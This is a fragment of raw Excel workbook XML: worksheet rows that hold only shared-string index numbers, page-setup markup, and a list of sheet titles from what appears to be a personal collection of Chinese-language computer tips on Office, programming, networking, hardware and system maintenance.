        <v>2581</v>
      </c>
    </row>
    <row r="839" spans="2:3" ht="15" thickBot="1">
      <c r="B839" s="104" t="s">
        <v>2582</v>
      </c>
      <c r="C839" s="104" t="s">
        <v>2583</v>
      </c>
    </row>
    <row r="840" spans="2:3" ht="15" thickBot="1">
      <c r="B840" s="104" t="s">
        <v>2584</v>
      </c>
      <c r="C840" s="104" t="s">
        <v>2585</v>
      </c>
    </row>
    <row r="841" spans="2:3" ht="15" thickBot="1">
      <c r="B841" s="104" t="s">
        <v>2586</v>
      </c>
      <c r="C841" s="104" t="s">
        <v>2587</v>
      </c>
    </row>
    <row r="842" spans="2:3" ht="15" thickBot="1">
      <c r="B842" s="104" t="s">
        <v>2588</v>
      </c>
      <c r="C842" s="104" t="s">
        <v>2589</v>
      </c>
    </row>
    <row r="843" spans="2:3" ht="15" thickBot="1">
      <c r="B843" s="104" t="s">
        <v>2590</v>
      </c>
      <c r="C843" s="104" t="s">
        <v>2591</v>
      </c>
    </row>
    <row r="844" spans="2:3" ht="15" thickBot="1">
      <c r="B844" s="104" t="s">
        <v>2592</v>
      </c>
      <c r="C844" s="104" t="s">
        <v>2593</v>
      </c>
    </row>
    <row r="845" spans="2:3" ht="15" thickBot="1">
      <c r="B845" s="104" t="s">
        <v>2594</v>
      </c>
      <c r="C845" s="104" t="s">
        <v>2595</v>
      </c>
    </row>
    <row r="846" spans="2:3" ht="15" thickBot="1">
      <c r="B846" s="104" t="s">
        <v>2596</v>
      </c>
      <c r="C846" s="104" t="s">
        <v>2597</v>
      </c>
    </row>
    <row r="847" spans="2:3" ht="15" thickBot="1">
      <c r="B847" s="104" t="s">
        <v>2598</v>
      </c>
      <c r="C847" s="104" t="s">
        <v>2599</v>
      </c>
    </row>
    <row r="848" spans="2:3" ht="15" thickBot="1">
      <c r="B848" s="104" t="s">
        <v>2600</v>
      </c>
      <c r="C848" s="104" t="s">
        <v>2601</v>
      </c>
    </row>
    <row r="849" spans="2:3" ht="15" thickBot="1">
      <c r="B849" s="104" t="s">
        <v>2602</v>
      </c>
      <c r="C849" s="104" t="s">
        <v>2603</v>
      </c>
    </row>
    <row r="850" spans="2:3" ht="15" thickBot="1">
      <c r="B850" s="104" t="s">
        <v>2604</v>
      </c>
      <c r="C850" s="104" t="s">
        <v>2605</v>
      </c>
    </row>
    <row r="851" spans="2:3" ht="15" thickBot="1">
      <c r="B851" s="104" t="s">
        <v>2606</v>
      </c>
      <c r="C851" s="104" t="s">
        <v>2972</v>
      </c>
    </row>
    <row r="852" spans="2:3" ht="15" thickBot="1">
      <c r="B852" s="104" t="s">
        <v>2607</v>
      </c>
      <c r="C852" s="104" t="s">
        <v>2608</v>
      </c>
    </row>
    <row r="853" spans="2:3" ht="15" thickBot="1">
      <c r="B853" s="104" t="s">
        <v>2609</v>
      </c>
      <c r="C853" s="104" t="s">
        <v>2610</v>
      </c>
    </row>
    <row r="854" spans="2:3" ht="15" thickBot="1">
      <c r="B854" s="104"/>
      <c r="C854" s="104"/>
    </row>
    <row r="855" spans="2:3" ht="15" thickBot="1">
      <c r="B855" s="104" t="s">
        <v>2611</v>
      </c>
      <c r="C855" s="104"/>
    </row>
    <row r="856" spans="2:3" ht="15" thickBot="1">
      <c r="B856" s="104" t="s">
        <v>2612</v>
      </c>
      <c r="C856" s="104" t="s">
        <v>2973</v>
      </c>
    </row>
    <row r="857" spans="2:3" ht="15" thickBot="1">
      <c r="B857" s="104" t="s">
        <v>2613</v>
      </c>
      <c r="C857" s="104" t="s">
        <v>2614</v>
      </c>
    </row>
    <row r="858" spans="2:3" ht="15" thickBot="1">
      <c r="B858" s="104" t="s">
        <v>2615</v>
      </c>
      <c r="C858" s="104" t="s">
        <v>2616</v>
      </c>
    </row>
    <row r="859" spans="2:3">
      <c r="C859" s="1"/>
    </row>
    <row r="860" spans="2:3">
      <c r="C860" s="1"/>
    </row>
    <row r="861" spans="2:3">
      <c r="C861" s="1"/>
    </row>
    <row r="862" spans="2:3">
      <c r="C862" s="1"/>
    </row>
    <row r="863" spans="2:3">
      <c r="C863" s="1"/>
    </row>
    <row r="864" spans="2:3">
      <c r="C864" s="1"/>
    </row>
    <row r="865" spans="3:3">
      <c r="C865" s="1"/>
    </row>
    <row r="866" spans="3:3">
      <c r="C866" s="1"/>
    </row>
  </sheetData>
  <autoFilter ref="A1:C866"/>
  <phoneticPr fontId="1" type="noConversion"/>
  <pageMargins left="0.70866141732283472" right="0.70866141732283472" top="0.35433070866141736" bottom="0.35433070866141736" header="0.31496062992125984" footer="0.31496062992125984"/>
  <pageSetup paperSize="9" scale="71" orientation="portrait" horizontalDpi="200" verticalDpi="200" r:id="rId1"/>
  <colBreaks count="1" manualBreakCount="1">
    <brk id="3" max="857" man="1"/>
  </col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123</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>命名范围</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="180" baseType="lpstr">
      <vt:lpstr>分类</vt:lpstr>
      <vt:lpstr>contents</vt:lpstr>
      <vt:lpstr>blank</vt:lpstr>
      <vt:lpstr>dreamweaver基础</vt:lpstr>
      <vt:lpstr>flash 时间轴</vt:lpstr>
      <vt:lpstr>绘制等轴侧图形</vt:lpstr>
      <vt:lpstr>CAD tips</vt:lpstr>
      <vt:lpstr>数据透视表</vt:lpstr>
      <vt:lpstr>电脑维护</vt:lpstr>
      <vt:lpstr>数组公式</vt:lpstr>
      <vt:lpstr>VF</vt:lpstr>
      <vt:lpstr>Delphi </vt:lpstr>
      <vt:lpstr>CSS样式</vt:lpstr>
      <vt:lpstr>HTML文档</vt:lpstr>
      <vt:lpstr>word中英文混排的技巧</vt:lpstr>
      <vt:lpstr>～$文档</vt:lpstr>
      <vt:lpstr>将Word变为无所不能的播放器</vt:lpstr>
      <vt:lpstr>网络硬件</vt:lpstr>
      <vt:lpstr>宽带路由器设置</vt:lpstr>
      <vt:lpstr>Modem网络连接</vt:lpstr>
      <vt:lpstr>常见故障解决记录与技巧</vt:lpstr>
      <vt:lpstr>软件工具分类</vt:lpstr>
      <vt:lpstr>系统小工具</vt:lpstr>
      <vt:lpstr>DOS、系统提示符、windows PE</vt:lpstr>
      <vt:lpstr>软件是如何被破解的</vt:lpstr>
      <vt:lpstr>虚拟virtual</vt:lpstr>
      <vt:lpstr>远程控制 远程桌面和远程协助</vt:lpstr>
      <vt:lpstr>低格、高格、快格的区别</vt:lpstr>
      <vt:lpstr>常用cmd网络命令的用法</vt:lpstr>
      <vt:lpstr>Command</vt:lpstr>
      <vt:lpstr>shortcut key</vt:lpstr>
      <vt:lpstr>打造三合一安装光盘</vt:lpstr>
      <vt:lpstr>杀毒软件如何辨忠奸</vt:lpstr>
      <vt:lpstr>硬盘分区、数据丢失、恢复的经历</vt:lpstr>
      <vt:lpstr>程序设计基础</vt:lpstr>
      <vt:lpstr>病毒修复、删除、隔离</vt:lpstr>
      <vt:lpstr>网络的安全性</vt:lpstr>
      <vt:lpstr>防火墙</vt:lpstr>
      <vt:lpstr>是否有毒最关注的三大件</vt:lpstr>
      <vt:lpstr>什么情况下适合修复系统而不是重装</vt:lpstr>
      <vt:lpstr>电脑死机原因种种</vt:lpstr>
      <vt:lpstr>蓝屏并自动分析可能故障原因</vt:lpstr>
      <vt:lpstr>在纯DOS模式下杀毒</vt:lpstr>
      <vt:lpstr>高级启动</vt:lpstr>
      <vt:lpstr>MS操作系统各版本介绍</vt:lpstr>
      <vt:lpstr>双系统启动顺序</vt:lpstr>
      <vt:lpstr>操作系统原理</vt:lpstr>
      <vt:lpstr>可启动光盘 硬盘 恢复盘 启动盘</vt:lpstr>
      <vt:lpstr>恢复win7的quick launch</vt:lpstr>
      <vt:lpstr>黑客必学的六条系统命令</vt:lpstr>
      <vt:lpstr>雨林木风 WinXP SP2 安装</vt:lpstr>
      <vt:lpstr>XP安装</vt:lpstr>
      <vt:lpstr>手机里暗藏的十大秘密</vt:lpstr>
      <vt:lpstr>快速格式化和普通格式化有什么不同 </vt:lpstr>
      <vt:lpstr>电脑不启动故障诊治全攻略</vt:lpstr>
      <vt:lpstr>无敌删除命令</vt:lpstr>
      <vt:lpstr>实现WORD双面打印的简便方法</vt:lpstr>
      <vt:lpstr>VF主程序设计</vt:lpstr>
      <vt:lpstr>数据的类型</vt:lpstr>
      <vt:lpstr>对象的属性、事件、方法</vt:lpstr>
      <vt:lpstr>form</vt:lpstr>
      <vt:lpstr>VFP 6.0文件类型</vt:lpstr>
      <vt:lpstr>软件下载、安装、运行、卸载</vt:lpstr>
      <vt:lpstr>注册表</vt:lpstr>
      <vt:lpstr>驱动(driver)</vt:lpstr>
      <vt:lpstr>文件关联、默认程序、打开方式</vt:lpstr>
      <vt:lpstr>系统瘦身和清理</vt:lpstr>
      <vt:lpstr>丈量字符的尺寸</vt:lpstr>
      <vt:lpstr>计算机十二种常用密码破解法</vt:lpstr>
      <vt:lpstr>极点五笔</vt:lpstr>
      <vt:lpstr>定时开关机</vt:lpstr>
      <vt:lpstr>ARP欺骗与防止</vt:lpstr>
      <vt:lpstr>如何读取损坏光盘中的文件</vt:lpstr>
      <vt:lpstr>硅胶和导热硅脂</vt:lpstr>
      <vt:lpstr>计划任务程序</vt:lpstr>
      <vt:lpstr>网络基础</vt:lpstr>
      <vt:lpstr>Excel函数</vt:lpstr>
      <vt:lpstr>Excel基础</vt:lpstr>
      <vt:lpstr>word Excel中的超链接</vt:lpstr>
      <vt:lpstr>word基础</vt:lpstr>
      <vt:lpstr>页面布局纵横</vt:lpstr>
      <vt:lpstr>保护页眉</vt:lpstr>
      <vt:lpstr>合并多个word文档</vt:lpstr>
      <vt:lpstr>修改注册表激活Administrator帐户</vt:lpstr>
      <vt:lpstr>Internet connection diagram</vt:lpstr>
      <vt:lpstr>计算机相关单位</vt:lpstr>
      <vt:lpstr>忘记自动登录密码</vt:lpstr>
      <vt:lpstr>ABC帐户只能在规定时间内登录</vt:lpstr>
      <vt:lpstr>禁止特定软件在另外一个帐户中运行</vt:lpstr>
      <vt:lpstr>帐户基础</vt:lpstr>
      <vt:lpstr>HP Pavilion dv2623</vt:lpstr>
      <vt:lpstr>程序和DLL文件</vt:lpstr>
      <vt:lpstr>文件夹大小的显示</vt:lpstr>
      <vt:lpstr>WD table cell</vt:lpstr>
      <vt:lpstr>Microsoft office</vt:lpstr>
      <vt:lpstr>Windows Live 软件包</vt:lpstr>
      <vt:lpstr>microsoft visual studio</vt:lpstr>
      <vt:lpstr>计算机英语缩略语</vt:lpstr>
      <vt:lpstr>Nero Burning ROM多区段DVD刻录</vt:lpstr>
      <vt:lpstr>光盘格式</vt:lpstr>
      <vt:lpstr>ISO映像文件操作</vt:lpstr>
      <vt:lpstr>系统安装明细</vt:lpstr>
      <vt:lpstr>Windows轻松传送</vt:lpstr>
      <vt:lpstr>windows7 宽带自动连接</vt:lpstr>
      <vt:lpstr>自动登录帐户</vt:lpstr>
      <vt:lpstr>blank (2)</vt:lpstr>
      <vt:lpstr>显卡</vt:lpstr>
      <vt:lpstr>显示器</vt:lpstr>
      <vt:lpstr>光驱</vt:lpstr>
      <vt:lpstr>硬盘</vt:lpstr>
      <vt:lpstr>内存</vt:lpstr>
      <vt:lpstr>主板</vt:lpstr>
      <vt:lpstr>CPU</vt:lpstr>
      <vt:lpstr>打印机</vt:lpstr>
      <vt:lpstr>扫描仪和UPS</vt:lpstr>
      <vt:lpstr>传真机</vt:lpstr>
      <vt:lpstr>复印机</vt:lpstr>
      <vt:lpstr>PC基础知识点index</vt:lpstr>
      <vt:lpstr>PC基础知识点</vt:lpstr>
      <vt:lpstr>电脑硬件组装</vt:lpstr>
      <vt:lpstr>电脑硬件组装图</vt:lpstr>
      <vt:lpstr>windows系统内容路径</vt:lpstr>
      <vt:lpstr>windows系统内容</vt:lpstr>
      <vt:lpstr>'Internet connection diagram'!Print_Area</vt:lpstr>
      <vt:lpstr>windows系统内容!Print_Area</vt:lpstr>
      <vt:lpstr>'驱动(driver)'!Print_Area</vt:lpstr>
      <vt:lpstr>系统安装明细!Print_Area</vt:lpstr>
      <vt:lpstr>'～$文档'!Print_Titles</vt:lpstr>
      <vt:lpstr>blank!Print_Titles</vt:lpstr>
      <vt:lpstr>'CAD tips'!Print_Titles</vt:lpstr>
      <vt:lpstr>Command!Print_Titles</vt:lpstr>
      <vt:lpstr>CSS样式!Print_Titles</vt:lpstr>
      <vt:lpstr>'Delphi '!Print_Titles</vt:lpstr>
      <vt:lpstr>'DOS、系统提示符、windows PE'!Print_Titles</vt:lpstr>
      <vt:lpstr>dreamweaver基础!Print_Titles</vt:lpstr>
      <vt:lpstr>'flash 时间轴'!Print_Titles</vt:lpstr>
      <vt:lpstr>HTML文档!Print_Titles</vt:lpstr>
      <vt:lpstr>Modem网络连接!Print_Titles</vt:lpstr>
      <vt:lpstr>'shortcut key'!Print_Titles</vt:lpstr>
      <vt:lpstr>VF!Print_Titles</vt:lpstr>
      <vt:lpstr>word中英文混排的技巧!Print_Titles</vt:lpstr>
      <vt:lpstr>病毒修复、删除、隔离!Print_Titles</vt:lpstr>
      <vt:lpstr>操作系统原理!Print_Titles</vt:lpstr>
      <vt:lpstr>常见故障解决记录与技巧!Print_Titles</vt:lpstr>
      <vt:lpstr>常用cmd网络命令的用法!Print_Titles</vt:lpstr>
      <vt:lpstr>程序设计基础!Print_Titles</vt:lpstr>
      <vt:lpstr>传真机!Print_Titles</vt:lpstr>
      <vt:lpstr>打印机!Print_Titles</vt:lpstr>
      <vt:lpstr>打造三合一安装光盘!Print_Titles</vt:lpstr>
      <vt:lpstr>电脑不启动故障诊治全攻略!Print_Titles</vt:lpstr>
      <vt:lpstr>电脑死机原因种种!Print_Titles</vt:lpstr>
      <vt:lpstr>电脑硬件组装!Print_Titles</vt:lpstr>
      <vt:lpstr>防火墙!Print_Titles</vt:lpstr>
      <vt:lpstr>复印机!Print_Titles</vt:lpstr>
      <vt:lpstr>高级启动!Print_Titles</vt:lpstr>
      <vt:lpstr>黑客必学的六条系统命令!Print_Titles</vt:lpstr>
      <vt:lpstr>绘制等轴侧图形!Print_Titles</vt:lpstr>
      <vt:lpstr>将Word变为无所不能的播放器!Print_Titles</vt:lpstr>
      <vt:lpstr>'可启动光盘 硬盘 恢复盘 启动盘'!Print_Titles</vt:lpstr>
      <vt:lpstr>宽带路由器设置!Print_Titles</vt:lpstr>
      <vt:lpstr>蓝屏并自动分析可能故障原因!Print_Titles</vt:lpstr>
      <vt:lpstr>软件是如何被破解的!Print_Titles</vt:lpstr>
      <vt:lpstr>扫描仪和UPS!Print_Titles</vt:lpstr>
      <vt:lpstr>杀毒软件如何辨忠奸!Print_Titles</vt:lpstr>
      <vt:lpstr>什么情况下适合修复系统而不是重装!Print_Titles</vt:lpstr>
      <vt:lpstr>是否有毒最关注的三大件!Print_Titles</vt:lpstr>
      <vt:lpstr>手机里暗藏的十大秘密!Print_Titles</vt:lpstr>
      <vt:lpstr>数据透视表!Print_Titles</vt:lpstr>
      <vt:lpstr>数组公式!Print_Titles</vt:lpstr>
      <vt:lpstr>网络的安全性!Print_Titles</vt:lpstr>
      <vt:lpstr>网络硬件!Print_Titles</vt:lpstr>
      <vt:lpstr>虚拟virtual!Print_Titles</vt:lpstr>
      <vt:lpstr>硬盘分区、数据丢失、恢复的经历!Print_Titles</vt:lpstr>
      <vt:lpstr>'远程控制 远程桌面和远程协助'!Print_Titles</vt:lpstr>
      <vt:lpstr>在纯DOS模式下杀毒!Print_Titles</vt:lpstr>
      <vt:lpstr>XFD1052088</vt:lpstr>
      <vt:lpstr>XFD1062088</vt:lpstr>
      <vt:lpstr>XFD1092088</vt:lpstr>
      <vt:lpstr>XFD1111111</vt:lpstr>
      <vt:lpstr>XFD4448384</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2010-10-16T07:41:49Z</dcterms:modified>
</cp:coreProperties>
</file>